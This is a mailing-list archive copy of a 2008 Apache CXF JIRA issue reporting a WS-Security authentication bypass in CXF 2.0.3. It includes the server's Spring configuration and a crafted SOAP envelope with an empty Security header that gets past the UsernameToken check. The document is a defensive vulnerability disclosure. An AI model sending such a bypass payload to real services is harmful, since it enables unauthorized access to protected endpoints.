cxf-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From Loïc FRERING (JIRA) <j...@apache.org>
Subject [jira] Created: (CXF-1433) WS-Security vulnerability
Date Thu, 14 Feb 2008 14:53:09 GMT
WS-Security vulnerability
-------------------------

                 Key: CXF-1433
                 URL: https://issues.apache.org/jira/browse/CXF-1433
             Project: CXF
          Issue Type: Bug
          Components: WS-* Components
    Affects Versions: 2.0.3
         Environment: Tomcat 5.5, Spring 2 and CXF 2.0.3 for the server and Flex WS-client
            Reporter: Loïc FRERING
            Priority: Critical


It is possible to bypass the security checks configured with WS-Security.

Server configured with an Username Token WS-Security authentication with Spring :

<jaxws:endpoint id="helloWorld" implementor="service.impl.HelloWorldImpl" address="/HelloWorld">
		<jaxws:inInterceptors>
			<bean class="org.apache.cxf.binding.soap.saaj.SAAJInInterceptor"/>
			<bean class="org.apache.cxf.ws.security.wss4j.WSS4JInInterceptor">
				<constructor-arg>
					<map>
						<entry key="action" value="UsernameToken"/>
						<entry key="passwordType" value="PasswordDigest"/>
						<entry key="passwordCallbackClass" value="service.security.ServerPasswordHandler"/>
					</map>
				</constructor-arg>
			</bean>
			<bean class="org.apache.cxf.interceptor.LoggingInInterceptor"/>
			<bean class="org.apache.cxf.interceptor.LoggingOutInterceptor"/>
		</jaxws:inInterceptors>
	</jaxws:endpoint>

When a SOAP message is created and sent with the following header, the server do not process
the authentication and return the response :

<SOAP-ENV:Envelope>
	<SOAP-ENV:Header>
	        <ns0:Security>
                        <ns0:wsse>Security</ns0:wsse>
                </ns0:Security>
        </SOAP-ENV:Header>

	<SOAP-ENV:Body>
        	<ns0:sayHi>
                        <name>Loïc</name>
                </ns0:sayHi>
        </SOAP-ENV:Body>
</SOAP-ENV:Envelope>

So it is possible to bypass all the security checks configured and to use it.

-- 
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.


Mime
View raw message